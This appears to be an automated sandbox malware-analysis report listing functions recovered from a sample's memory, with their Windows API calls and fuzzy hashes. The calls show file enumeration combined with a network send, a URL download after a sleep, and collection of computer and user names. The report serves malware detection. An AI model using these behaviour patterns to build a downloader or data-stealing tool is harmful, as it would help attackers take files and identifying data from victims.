                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$FirstNextsend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4113138495-0
                                                                                                                                                    • Opcode ID: 167cf14790be9969fe3e4eee11eaea23ca97df22ad7d134952818e71039f3663
                                                                                                                                                    • Instruction ID: 7a6a9cfc5d5abf77d3754e9699248e54b71d2ed093d960969f6c44093d499b21
                                                                                                                                                    • Opcode Fuzzy Hash: 167cf14790be9969fe3e4eee11eaea23ca97df22ad7d134952818e71039f3663
                                                                                                                                                    • Instruction Fuzzy Hash: 73218D3660A3459BC714EB60D894DEFB7ACAF90324F800D1DE59653190EF35BA09CAE6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569662D Relevance: 3.1, APIs: 2, Instructions: 68sleepfilenetworkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32 ref: 15696640
                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 156966A2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DownloadFileSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1931167962-0
                                                                                                                                                    • Opcode ID: 1f0ce62594cd7b928e7cc4b5ff42b02bd13a314997707ddf11655d776faf8202
                                                                                                                                                    • Instruction ID: cb521a8504788c53152a69d115f62df16e525dea8fc0771d7badccc3960acca7
                                                                                                                                                    • Opcode Fuzzy Hash: 1f0ce62594cd7b928e7cc4b5ff42b02bd13a314997707ddf11655d776faf8202
                                                                                                                                                    • Instruction Fuzzy Hash: DB119079B0A3469FC718EF70CCA59BE73E9AF51204F440C2DE58292281EF30B908C6D6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetComputerNameExW.KERNEL32(00000001,?,0000002B,156F50E4), ref: 1569B62A
                                                                                                                                                    • GetUserNameW.ADVAPI32(?,1568F223), ref: 1569B642
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Name$ComputerUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4229901323-0
                                                                                                                                                    • Opcode ID: 02eee1ac232bc7f75f215f322f91a2aa8809f9602dc8df912fe4785c7a22202f
                                                                                                                                                    • Instruction ID: b3a2202af304b6efe098c11f585e76705af3ae917ffcd52aab343070cf8b6667
                                                                                                                                                    • Opcode Fuzzy Hash: 02eee1ac232bc7f75f215f322f91a2aa8809f9602dc8df912fe4785c7a22202f
                                                                                                                                                    • Instruction Fuzzy Hash: CD014F75A0121CABCB10DBD4DC54ADDB7BCAF04305F10015AE405A6150EF707A89CBE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15692077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,15691F37,?,?,?,?,00000000), ref: 156920E7
                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 156920EE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                    • Opcode ID: b214187a7f75824f7caad5250487fa1177722e850c714118873df07abdcbfcd7
                                                                                                                                                    • Instruction ID: 34042a1f55925fcac5a20be494dcb34ff5d1397003533b40d585e2cfd540cfe8
                                                                                                                                                    • Opcode Fuzzy Hash: b214187a7f75824f7caad5250487fa1177722e850c714118873df07abdcbfcd7
                                                                                                                                                    • Instruction Fuzzy Hash: 3A113532505A12EFCB349F64DD88827BBEAFF04621301882EE19756821CB72F890DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D332B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,156D3326,?,?,00000008,?,?,156D61DD,00000000), ref: 156D3558
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                    • Opcode ID: 906af5ec5ba56fa046794e4886ee46cab547c08eb19cc500842579f516f585ba
                                                                                                                                                    • Instruction ID: 801dd445a50b4370284e16339ed6f2e839f8259de701a3ea2b1b5fe602fb3277
                                                                                                                                                    • Opcode Fuzzy Hash: 906af5ec5ba56fa046794e4886ee46cab547c08eb19cc500842579f516f585ba
                                                                                                                                                    • Instruction Fuzzy Hash: 96B15C716147099FD705CF28C486B68BBE0FF45365F258A58E8DACF2A1C739E991CB80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156B3946 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                    • Opcode ID: cabcd2f59a54c4024e0914ba878c5e3260e726e5f3ec9c6a847880ebfd970970
                                                                                                                                                    • Instruction ID: 87a51122327ff24baec74357ed56c0105ad1189acb77529d223df0f420b14222
                                                                                                                                                    • Opcode Fuzzy Hash: cabcd2f59a54c4024e0914ba878c5e3260e726e5f3ec9c6a847880ebfd970970
                                                                                                                                                    • Instruction Fuzzy Hash: 3D123836B093008BD754CF69D851A1FB3E2BFCC754F15892DE985AB290DA74F805CB8A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D2313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                      • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C8274
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8281
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 156D2367
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1663032902-0
                                                                                                                                                    • Opcode ID: 41f0b85667676e4f1408e77c22b7e9ac1650053d64dbbdad1db3a5e3cdd17b2d
                                                                                                                                                    • Instruction ID: 13594e60a03e0b0645db930d9715548de0b492445806b2a9d949f4dcfc844903
                                                                                                                                                    • Opcode Fuzzy Hash: 41f0b85667676e4f1408e77c22b7e9ac1650053d64dbbdad1db3a5e3cdd17b2d
                                                                                                                                                    • Instruction Fuzzy Hash: 5A21C236A1131AABDB248E24CC41FAAB3ADFF04720F1105BAED41D6540EB75B980DBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D1F9B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                      • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(156D20C3,00000001,00000000,?,156C4A6C,?,156D26F0,00000000,?,?,?), ref: 156D200D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1084509184-0
                                                                                                                                                    • Opcode ID: e91b461f45197e2120b7f3f869a14352acc2083f94e9b0de30499240971c6458
                                                                                                                                                    • Instruction ID: affdff97a6d476873b19d6df0c598309eaaf7b3b6616a7894242f49a55dc3260
                                                                                                                                                    • Opcode Fuzzy Hash: e91b461f45197e2120b7f3f869a14352acc2083f94e9b0de30499240971c6458
                                                                                                                                                    • Instruction Fuzzy Hash: DF110C3B6007059FD7189F39C890ABAF792FF84368B14492DD98747B40D775B542C790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE7F90 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02DE7FB1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DiskFreeSpace
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1705453755-0
                                                                                                                                                    • Opcode ID: b0f2a126e6bfdbec3624709fe996a37f07710e4d7c3479fe4a57f6dc015cd93b
                                                                                                                                                    • Instruction ID: 13219e94f9d8928c816d1c2f47f3340c58630cdaf2fed018a60707949b058820
                                                                                                                                                    • Opcode Fuzzy Hash: b0f2a126e6bfdbec3624709fe996a37f07710e4d7c3479fe4a57f6dc015cd93b
                                                                                                                                                    • Instruction Fuzzy Hash: A4110CB5E00209AFDB00DF99C8819AFF7F9EFC8300F14C569A509E7354E6319E018BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D2543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                      • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,156D22E1,00000000,00000000,?), ref: 156D256F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2692324296-0
                                                                                                                                                    • Opcode ID: 0485839e86c3b15c40ceb25ff81d5a11d606e5c4b3363e585e3d42a4ebb03e00
                                                                                                                                                    • Instruction ID: 19f7063dcf2bd97d55b23e280448e32c7af080cc43406593f792229805919410
                                                                                                                                                    • Opcode Fuzzy Hash: 0485839e86c3b15c40ceb25ff81d5a11d606e5c4b3363e585e3d42a4ebb03e00
                                                                                                                                                    • Instruction Fuzzy Hash: 04F04932E10316ABD7244B20C815FBAB76AFB403B4F004868EC96A3540EB75FD51C6E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D2036 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                      • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(156D2313,00000001,?,?,156C4A6C,?,156D26B4,156C4A6C,?,?,?,?,?,156C4A6C,?,?), ref: 156D2082
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1084509184-0
                                                                                                                                                    • Opcode ID: 5ad9319eabd7ee1c6799c6c0214e7fc85e4162511359f2ef399b88213dd06cca
                                                                                                                                                    • Instruction ID: a47ebe0bd7e726c01aed05ccab97bd3f7fd0c3c6444a0b9067035ac1a296a1c4
                                                                                                                                                    • Opcode Fuzzy Hash: 5ad9319eabd7ee1c6799c6c0214e7fc85e4162511359f2ef399b88213dd06cca
                                                                                                                                                    • Instruction Fuzzy Hash: 60F0F6767007055FD7245F39CC80B6ABB96FF80378B15896CE9878BA40D7B2A842C690
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C8404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C5888: EnterCriticalSection.KERNEL32(?,?,156C2FDB,00000000,156EE928,0000000C,156C2F96,?,?,?,156C5B26,?,?,156C82CA,00000001,00000364), ref: 156C5897
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(156C83BE,00000001,156EEAD0,0000000C), ref: 156C843C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                    • Opcode ID: f1f6b7491f118544f4ec5882266366b645192c64295fb2ca16f92c2ba56b5337
                                                                                                                                                    • Instruction ID: 81556d846eeb7f87cc6c374a0437dbab93ee2c42d51cd00988330cf29a6700f1
                                                                                                                                                    • Opcode Fuzzy Hash: f1f6b7491f118544f4ec5882266366b645192c64295fb2ca16f92c2ba56b5337
                                                                                                                                                    • Instruction Fuzzy Hash: 79F04F7AA61218EFD710DF68C895B9D77E5FB04321F10859AE410DB290CF756940CFD9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D1F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                      • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
                                                                                                                                                      • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                      • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(156D1EA7,00000001,?,?,?,156D2712,156C4A6C,?,?,?,?,?,156C4A6C,?,?,?), ref: 156D1F87
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1084509184-0
                                                                                                                                                    • Opcode ID: df707e7511f53b1ccbbd2df6c09351faff82c7441997c1c365b688ad4f0b0ba7
                                                                                                                                                    • Instruction ID: e2c8826b71a8636f3cd6fbb131205ca51edaeedeba134b5ff3803017bcc1786d
                                                                                                                                                    • Opcode Fuzzy Hash: df707e7511f53b1ccbbd2df6c09351faff82c7441997c1c365b688ad4f0b0ba7
                                                                                                                                                    • Instruction Fuzzy Hash: 6FF0E53AB4034A97C7149F35C858E6AFF95FFC2724B064898EA458BA40C776E942C7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEA780 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DEA79E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                    • Opcode ID: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                                                    • Instruction ID: feeb8c3de5cae5ee239750e2d657230c7d787c04f08c46386d0bee28130c61d8
                                                                                                                                                    • Opcode Fuzzy Hash: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                                                    • Instruction Fuzzy Hash: A9E0D87170021817DB11F5595C819FA726DEB5C710F00417FBD5AC7341EEA0DD408AF4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEB748 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExA.KERNEL32(?,02E0A106,00000000,02E0A11E), ref: 02DEB756
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Version
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                    • Opcode ID: 3a65f5eb91bcad8ef286a16987bf4636baf3d6d297023bf91f128577605e7fef
                                                                                                                                                    • Instruction ID: 40b68365c7edb812432e059abd085853fc0ac8df9f4b250838caf01f43e33043
                                                                                                                                                    • Opcode Fuzzy Hash: 3a65f5eb91bcad8ef286a16987bf4636baf3d6d297023bf91f128577605e7fef
                                                                                                                                                    • Instruction Fuzzy Hash: 0CF017749843018FC750EF29D48161577E1FB48718F888E2DE899C7384D735E895CFA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEA7CC Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02DEBE2E,00000000,02DEC047,?,?,00000000,00000000), ref: 02DEA7DF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                    • Opcode ID: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                                                    • Instruction ID: 14cf6e0960d4500240eadd69093960ddc5c694d25ddfe685fbaf8b26c6812047
                                                                                                                                                    • Opcode Fuzzy Hash: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                                                    • Instruction Fuzzy Hash: BDD05EAA30E2A03AA620B15A2D85DBB5AECCAC57B1F00447EB989C6301D200CC06D6B1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156BE0CC Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
